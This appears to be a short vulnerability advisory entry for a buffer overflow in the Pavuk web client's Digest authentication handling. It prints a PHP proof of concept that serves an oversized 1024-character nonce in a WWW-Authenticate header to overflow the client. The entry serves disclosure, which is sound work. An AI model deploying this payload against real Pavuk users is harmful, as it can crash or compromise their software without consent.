|
Pavuk Remote Digest Authentication Buffer Overflow Vulnerability
The following proof of concept is available: <?php $buffer = ""; for ($i = 0; $i < 1024; $i++) { $buffer .= "A"; } header("WWW-Authenticate: Digest realm=\"Secured by Digest Auth\" opaque=\"opaque\" nonce=\"$buffer\""); header("Status: 401 Not Authorized"); ?> |
|
Privacy Statement |